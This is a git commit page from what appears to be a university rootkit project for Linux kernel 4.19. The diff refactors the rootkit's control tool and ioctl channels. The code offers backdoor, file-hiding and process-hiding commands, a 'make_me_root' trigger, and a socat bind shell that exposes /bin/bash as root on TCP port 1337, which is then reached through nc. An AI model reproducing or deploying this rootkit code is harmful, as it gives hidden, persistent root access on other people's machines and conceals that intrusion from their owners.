linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs
commit 09f487de7866e24995d29dd8ce99b23c369e7d65
parent fbe2cb88bab55c1b79f0d705b8966b718d938c2d
Author: deurzen <m.deurzen@tum.de>
Date:   Sat, 28 Nov 2020 12:16:14 +0100

refactors code

Diffstat:

Msrc/channel.c | 3+++


Msrc/ioctl.h | 4++--


Msrc/rkctl/rkctl.c | 15+++++++++------


3 files changed, 14 insertions(+), 8 deletions(-)

diff --git a/src/channel.c b/src/channel.c
@@ -21,6 +21,9 @@ report_channels(void)
     DEBUG_NOTICE("listening on the following channels\n");
     DEBUG_NOTICE("%-24s %#10lx\n", "PING",     G7_PING);
     DEBUG_NOTICE("%-24s %#10lx\n", "FILEHIDE", G7_FILEHIDE);
+    DEBUG_NOTICE("%-24s %#10lx\n", "BACKDOOR", G7_BACKDOOR);
+    DEBUG_NOTICE("%-24s %#10lx\n", "TOGGLEBD", G7_TOGGLEBD);
+    DEBUG_NOTICE("%-24s %#10lx\n", "HIDEPID",  G7_HIDEPID);
     DEBUG_NOTICE("-----------------------------------\n");
 }
 
diff --git a/src/ioctl.h b/src/ioctl.h
@@ -4,10 +4,10 @@
 #define G7_MAGIC_NUMBER '@'
 #define G7_DEVICE "g7rkp"
 
-#define G7_PING _IOWR(G7_MAGIC_NUMBER, 0x0, char *)
+#define G7_PING     _IOWR(G7_MAGIC_NUMBER, 0x0, char *)
 #define G7_FILEHIDE _IOR(G7_MAGIC_NUMBER, 0x1, char *)
 #define G7_BACKDOOR _IOR(G7_MAGIC_NUMBER, 0x2, char *)
 #define G7_TOGGLEBD _IOR(G7_MAGIC_NUMBER, 0x3, char *)
-#define G7_HIDEPID _IOR(G7_MAGIC_NUMBER, 0x4, char *)
+#define G7_HIDEPID  _IOR(G7_MAGIC_NUMBER, 0x4, char *)
 
 #endif//_GROUP7_IOCTL_H
diff --git a/src/rkctl/rkctl.c b/src/rkctl/rkctl.c
@@ -52,20 +52,22 @@ parse_input(int argc, char **argv)
         return (cmd_t){ handle_backdoor, (void *)argv[2] };
     }
 
-    if (ARGVCMP(1, "shell")) {
+    if (ARGVCMP(1, "shell"))
         return (cmd_t){ handle_shellbd, NULL };
-    }
 
     if (ARGVCMP(1, "backdoor-use-tty")) {
         ASSERT_ARGC(2, "backdoor-use-tty <0 | 1>");
 
         if (ARGVCMP(2, "0"))
-            return (cmd_t){ handle_togglebd, (void *)0 };
+            return (cmd_t){ handle_togglebd, (void *)-1 };
 
         if (ARGVCMP(2, "1"))
             return (cmd_t){ handle_togglebd, (void *)1 };
     }
 
+    if (ARGVCMP(1, "backdoor-off"))
+            return (cmd_t){ handle_togglebd, (void *)0 };
+
     if (ARGVCMP(1, "hidepid")) {
         ASSERT_ARGC(3, "hidepid <add | remove> <PID>");
         // TODO: return hidepid handle
@@ -99,7 +101,7 @@ handle_shellbd(void *arg)
     const char *socat_cmd = "socat tcp4-listen:1337,reuseaddr,fork"
         " exec:/bin/bash,pty,stderr,setsid";
 
-    int ret = issue_ioctl(G7_BACKDOOR, socat_cmd);
+    issue_ioctl(G7_BACKDOOR, socat_cmd);
 
     char *argv[] = {
         "nc",
@@ -108,8 +110,7 @@ handle_shellbd(void *arg)
         NULL
     };
 
-    execve(argv[0], argv, NULL);
-    return ret;
+    return execve(argv[0], argv, NULL);
 }
 
 int
@@ -150,6 +151,8 @@ help()
     printf("%-32s %s\n", "ping", "send an echo request to the rootkit");
     printf("%-32s %s\n", "filehide <toggle | on | off>", "{,un}hide files");
     printf("%-32s %s\n", "backdoor <execve_command>", "exec a command as root");
+    printf("%-32s %s\n", "shell", "obtain a shell as root");
     printf("%-32s %s\n", "backdoor-use-tty <0 | 1>", "listen for `make_me_root` on read (0) or tty (1)");
+    printf("%-32s %s\n", "backdoor-off", "disable any (read or tty) backdoor");
     printf("%-32s %s\n", "hidepid <add | remove> <PID>", "{,un}hide a process");
 }